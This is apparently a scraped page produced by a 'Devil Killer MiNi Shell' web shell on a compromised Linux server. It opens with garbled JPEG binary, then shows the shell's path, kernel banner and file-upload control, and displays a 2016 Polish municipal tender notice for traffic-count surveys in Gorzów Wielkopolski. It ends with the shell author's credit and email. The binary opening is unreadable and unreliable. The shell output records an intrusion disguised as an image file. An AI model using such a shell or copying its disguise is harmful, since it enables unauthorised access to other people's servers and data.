JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160112/2655-N-2016.html

<p class="kh_header"><b>Gorzów Wielkopolski: Przeprowadzenie pomiarów natężenia ruchu kołowego na sieci drogowej Gorzowa Wielkopolskiego.</b><br>
<b>Numer ogłoszenia: 2655 - 2016; data zamieszczenia: 12.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gorzów Wlkp. , ul. Sikorskiego 3-4, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7355576, faks 095 7355612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wrota.lubuskie.pl/umgorzow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie pomiarów natężenia ruchu kołowego na sieci drogowej Gorzowa Wielkopolskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: przeprowadzenie badań natężenia ruchu drogowego w obszarze miasta Gorzów Wielkopolski. Przedmiotem zamówienia jest zaplanowanie, realizacja oraz opracowanie wyników pomiarów natężenia ruchu kołowego na terenie miasta Gorzów Wielkopolski. Badania te mają uwzględniać zapotrzebowanie na niezbędne dane potrzebne do budowy, kalibracji i weryfikacji transportowego modelu symulacyjnego podróży miasta Gorzów Wielkopolski.
Zamówienie obejmuje:
1.1.	Przeprowadzenie badań natężenia ruchu drogowego z wykorzystaniem kart pomiarowych zgodnych z załącznikiem nr 3 do niniejszego pisma.
1.2.	Wykonanie pomiarów natężenia ruchu drogowego w co najmniej 45 punktach przekrojowych i skrzyżowaniach wskazanych przez Zamawiającego - z wyszczególnieniem struktury rodzajowej pojazdów (samochód osobowy, samochód dostawczy, samochód ciężarowy
1.3.	Wykonanie pomiarów natężenia ruchu drogowego w co najmniej 45 punktach przekrojowych i skrzyżowaniach wskazanych przez Zamawiającego - z wyszczególnieniem struktury rodzajowej pojazdów (samochód osobowy, samochód dostawczy, samochód ciężarowy, samochód ciężarowy z naczepą, autobus, motocykl, rower, inny).
1.4.	W zależności od punktu pomiarowego pomiar powinien trwać co najmniej 5 godzin w ciągu dnia (w godzinach: 7:00-9:00 i 14:00-17:00), 16 godzin (6:00-22:00) lub 24 godziny.
1.5.	Pomiary należy wykonać w przedziałach 15 minutowych, dla dwóch kierunków ruchu w przypadku pomiarów przekrojowych oraz dla poszczególnych relacji skrętnych na skrzyżowaniach. 
1.6.	Należy określić sumę samochodów w pojazdach rzeczywistych oraz w pojazdach umownych.
1.7.	Pomiary należy wykonać w typowy dzień tygodnia: wtorek, środa lub czwartek.
1.8.	Pomiary należy przeprowadzić w terminie od 1.03.2016 r. do 07.04.2016 r w możliwie jak najmniejszej liczbie dni celem minimalizacji rozbieżności w pomiarze natężenia ruchu na wspólnych odcinkach dla sąsiadujących ze sobą skrzyżowań.
1.9.	Lokalizację punktów pomiarowych wskaże Zamawiający, określono je w tabeli 1. Punkty pomiarowe należy podzielić na pakiety dniowe, na których będzie wykonywany pomiar jednego tego samego dnia. Pakiety dniowe powinny zostać ułożone w taki sposób aby zminimalizować rozbieżności w pomiarze natężenia ruchu na wspólnych odcinkach dla sąsiadujących ze sobą skrzyżowań. Układ pakietów dniowych (zestawy punktów) należy przedstawić Zamawiającemu wraz z uszczegółowionym harmonogramem wykonywania pomiarów.
1.10.	Uszczegółowioną metodykę przeprowadzanych pomiarów Wykonawca uzgodni z Zamawiającym.
1.11.	Przed rozpoczęciem pomiarów w terenie, Wykonawca na własny koszt, przeprowadzi szkolenie osób biorących udział w pomiarach.
1.12.	Wykonawca ma obowiązek wyposażyć osoby prowadzące badania w komplet niezbędnych instrumentów pomiarowych, m.in. takich jak karty pomiarowe, skonfigurowany zegarek, kamizelkę odblaskową, identyfikator (zgodny ze wzorem zatwierdzonym przez Zamawiającego, umieszczony w widocznym miejscu) oraz inne niezbędne narzędzia potrzebne do realizacji zadań.
1.13.	Wykonawca zobowiązany będzie do wcześniejszego (na minimum 2 dni) przedstawienia Zamawiającemu harmonogramu realizacji badań z wyszczególnieniem daty i punktów pomiarowych). Badanie przeprowadzone bez wcześniejszego poinformowania Zamawiającego będzie traktowane jako niezrealizowane.
1.14.	Zamawiający zastrzega sobie możliwość kontroli metody i jakości realizowanych pomiarów bez wcześniejszego poinformowania Wykonawcy.

Tabl. 1. Wykaz punktów pomiarowych (mapa punktów pomiarowych stanowi załącznik nr 8 do SIWZ) 
Lp.	Nr	Nazwa punktu	Zakres godzinowy pomiaru
                Skrzyżowania
1	251	Walczaka-Bierzarina-Górczyńska	7:00 - 9:00; 14:00 - 17:00
2	252	Wyszyńskiego-Górczyńska	7:00 - 9:00; 14:00 - 17:00
3	253	Wyszyńskiego-Roosvelta-Odrodzenia Polski 7:00 - 9:00; 14:00 - 17:00
4	254	Podmiejska-Pomorska-Okólna	7:00 - 9:00; 14:00 - 17:00
5	255	Podmiejska-Warszawska	7:00 - 9:00; 14:00 - 17:00
6	256	3 Maja-Estkowskiego	7:00 - 9:00; 14:00 - 17:00
7	257	Rondo Kosynierów Gdyńskich	7:00 - 9:00; 14:00 - 17:00
8	258	Chrobrego-Wybickiego-Jagiełły 7:00 - 9:00; 14:00 - 17:00
9	259	Walczaka-Piłsudskiego-Widok	7:00 - 9:00; 14:00 - 17:00
10	260	Chrobrego-Sikorskiego	7:00 - 9:00; 14:00 - 17:00
11	261	Rondo Szczecińskie	7:00 - 9:00; 14:00 - 17:00
12	262	Piłsudskiego-Górczyńska-Czartoryskiego	7:00 - 9:00; 14:00 - 17:00
13	263	Rondo Sybiraków	7:00 - 9:00; 14:00 - 17:00
14	264	Kasprzaka-Trasa Zgody (łącznica północna) 7:00 - 9:00; 14:00 - 17:00
15	265	Kasprzaka-Trasa Zgody (łącznica południowa) 7:00 - 9:00; 14:00 - 17:00
16	266	Szczecińska-Trasa Zgody (łącznica zach.)	7:00 - 9:00; 14:00 - 17:00
17	267	Szczecińska-Trasa Zgody (łącznica wsch.) 7:00 - 9:00; 14:00 - 17:00
18	268	Zielona-Grobla 7:00 - 9:00; 14:00 - 17:00
19	269	Grobla-Mazowiecka 7:00 - 9:00; 14:00 - 17:00
20	270	Nadwarciańska-Kasprzaka 7:00 - 9:00; 14:00 - 17:00
21	271	Koniawska-Kasprzaka 7:00 - 9:00; 14:00 - 17:00
22	272	Fabryczna-Wawrzyniaka	7:00 - 9:00; 14:00 - 17:00
23	273	Śląska-Bracka-Towarowa 7:00 - 9:00; 14:00 - 17:00
24	274	Kobylogórska-Krótka 7:00 - 9:00; 14:00 - 17:00
25	275	Poznańska-Sulęcińska 7:00 - 9:00; 14:00 - 17:00
26	276	Kosynierów Gdyńskich-Matejki	7:00 - 9:00; 14:00 - 17:00
27	277	Kosynierów Gdyńskich-Słowiańska-Roosvelta 7:00 - 9:00; 14:00 - 17:00
28	278	Rondo Myśliborskie 7:00 - 9:00; 14:00 - 17:00
29	279	Dobra-Kostrzyńska-Warzywna	7:00 - 9:00; 14:00 - 17:00
30	280	Okulickiego-Kombatantów-Jana Pawła II 7:00 - 9:00; 14:00 - 17:00
31	281	Kombatantów-Szarych Szeregów 7:00 - 9:00; 14:00 - 17:00
32	282	Czereśniowa-Piłsudskiego 7:00 - 9:00; 14:00 - 17:00
Przekroje 24 godz.
1	101	Walczaka  (S22 obok Parkowej - Osiedle Bermudy)	-
2	102	Wyszyńskiego (Srebrna-Skrajna)	-
3	103	Szczecińska (Mosiężna-Metalowców)	-
4	104	Kostrzyńska (obok Dolna - Polna ) 	-
5	105	Kasprzaka (granica miasta)	-
6	106	Podmiejska (granica miasta)	-
7	107	Trasa Zgody (nad Kostrzyńską)	-
8	131	Ruchu Młodzieży Niezależnej	-
9	132	Most Staromiejski	-
10	133	Wyszyńskiego (obok Na Skarpie)	-
11	134	Konstytucji 3 Maja (obok Żelaznej)	-
12	135	Sikorskiego (Żelazna-Jancarza)	-
Przekroje 16 godz.
1	201	Warszawska (obok Muzeum Lubuskiego)	6:00 - 22:00
2.	Raport z przeprowadzonych badań i pomiarów
Zamówienie obejmuje:
2.1.	Opracowanie wyników badań w postaci bazy danych (pliki MS Excel 2007 lub  Access 2007).
2.2.	Przygotowanie raportu zbiorczego z wszystkimi wynikami badania i pomiarów zawierającego informację na temat zastosowanych technik i metod badawczych oraz przedstawiającego wyniki badania i pomiarów. Raport ma być wykonany w wersji elektronicznej w formacie *.doc / *.docx oraz *.pdf).
2.3.	Raport wymaga uzgodnienia i zatwierdzenia przez Zamawiającego.
2.4.	Po opracowaniu wyników i wykonaniu raportu z badań Wykonawca zobowiązany jest do przekazania wszystkich oryginalnych kart pomiarowych Zamawiającemu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zgodnie z art. 67 ust. 1 pkt 6 stawy Pzp. Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.22.00.00-4, 79.31.12.00-9, 79.31.13.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.05.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości: 5 000,00 zł (słownie: pięć tysięcy zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, w tym zakresie, jeżeli Wykonawca wykaże, że wykonał 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej jedną usługę polegającą na pomiarze natężeń ruchu kołowego na sieci drogowej w co najmniej 40 punktach w okresie jednego miesiąca dla miasta powyżej 100 tys. mieszkańców w jego granicach administracyjnych lub zespole miast liczącym co najmniej 100 tys. mieszkańców w granicach tych miast oraz załączy dowody, potwierdzające, że usługa ta została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, w tym zakresie, jeżeli Wykonawca wykaże, że dysponuje na okres realizacji zamówienia osobami zdolnymi do wykonania zamówienia, posiadającymi niezbędne kwalifikacje tj.:
a) Ekspertem do spraw pomiarów, posiadającym co najmniej:
-3 letnie doświadczenie zawodowe w zakresie pomiarów ruchu 
oraz
- w okresie ostatnich trzech lat przed terminem składania ofert wziął udział w organizowaniu i prowadzeniu przynajmniej jednego pomiaru natężenia ruchu kołowego na sieci drogowej w mieście liczącym co najmniej 100 tys. mieszkańców w jego granicach administracyjnych lub zespole miast liczącym co najmniej 100 tys. mieszkańców w granicach tych miast jako autor kierujący opracowaniem/badaniem (lider zespołu) lub współautor (członek zespołu autorskiego),
b) minimum jednym członkiem zespołu, który brał udział w co najmniej 3  badaniach w zakresie pomiaru ruchu kołowego na sieci drogowej w miastach powyżej 100 tys. mieszkańców lub zespole miast liczącym co najmniej 100 tys. mieszkańców w granicach tych miast</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Upoważnienie dla osoby reprezentującej Wykonawcę, o ile nie wynika to z innych dokumentów. W przypadku zawiązania konsorcjum należy załączyć pełnomocnictwo dla podmiotu reprezentującego kilku Wykonawców.
Pisemne zobowiązanie podmiotów do oddania do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia - załączyć w przypadku polegania na zasobach innych podmiotów zgodnie z art.26 ust.2b Pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Termin realizacji - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany zapisów umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zmiany takie mogą wystąpić w przypadku:
- Zmiany mogą dotyczyć zmiany wynagrodzenia Wykonawcy, w przypadku zmiany stawki podatku Vat oraz zmiany osób, które będą uczestniczyć w realizacji zamówienia - zgodnie  z warunkami opisanymi w SIWZ.
- Dopuszcza się zmianę zapisów umowy, gdy zaistnieje siła wyższa lub inna, niemożliwa  do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy zgodnie z SIWZ lub wprowadzenie tych zmian jest korzystne  dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wrota.lubuskie.pl/umgorzow<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gorzowa Wlkp. ul. Sikorskiego 3-4 Gorzów Wlkp. II piętro Referat Zamówień Publicznych pok.315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2016 godzina 12:30, miejsce: Urząd Miasta Gorzowa Wlkp. ul. Myśliborska 34, 66-400 Gorzów Wlkp. 
Kancelaria ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com